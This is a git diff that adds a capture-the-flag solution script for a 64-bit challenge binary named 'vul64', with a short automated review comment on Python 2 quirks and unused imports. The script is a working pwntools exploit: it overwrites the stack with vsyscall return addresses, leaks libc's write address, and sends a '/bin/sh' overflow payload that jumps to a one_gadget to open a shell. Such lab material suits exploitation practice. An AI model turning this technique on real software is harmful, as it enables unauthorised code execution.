diff --git a/vsyscall/vul64/answer.py b/vsyscall/vul64/answer.py
new file mode 100644
index 0000000..298c1e1
--- /dev/null
+++ b/vsyscall/vul64/answer.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python2
+# -*- coding:utf-8 -*-
+
+from pwn import *
+from LibcSearcher import *
+import os
+import time
+import struct
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+# context.log_level = "debug"
+p = process('./vul64')
+elf = ELF('./vul64')
+
+#gdb.attach(p, "break *0x0000555555554a2b")
+
+#time.sleep(10)
+ret_addr = 0xffffffffff600400
+
+with open('input.txt', 'w') as f:
+    f.write(p64(ret_addr) * 30 + '\x2c')
+
+p.send(p64(ret_addr) * 30 + '\x2c')
+p.recvuntil("I have a gift for yoooou\n")
+write_libc = u64(p.recv(8))
+p.recvuntil("Want my flag? Keep going!\n")
+
+libc = LibcSearcher('write', write_libc)
+libc_base = write_libc - libc.dump('write')
+system_libc = libc_base + 0x4f3d5 # one_gadget Shift
+
+
+p.send("/bin/sh\x00" + '0' * 0x2f + p32(0x44) + p64(system_libc) + '\n')
+p.interactive()
diff --git a/vsyscall/vul64/vul64 b/vsyscall/vul64/vul64
new file mode 100755
index 0000000..8f0a22d
Binary files /dev/null and b/vsyscall/vul64/vul64 differ
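Review bot: The script depends on Python 2 string semantics throughout — `p64(ret_addr) * 30 + '\x2c'` and the final `p.send("/bin/sh\x00" + '0' * 0x2f + p32(0x44) + ...)` concatenate `p64`/`p32` output with plain string literals, which raises TypeError under Python 3 pwntools where those helpers return `bytes`; the `#!/usr/bin/python2` shebang is the only hint, so a comment such as `# Python 2 only: the str/bytes concatenations below fail on Python 3` next to it would spare the next reader a confusing traceback. The `import os`, `import time` and `import struct` lines are unused (the `time.sleep(10)` call is commented out), and `input.txt` is written but never read by the script, so those lines are dead and can be dropped. `log_level = "debug"` is set in the `context(...)` call and again in the commented-out line below it; keeping only one of the two makes the intended logging setting clear.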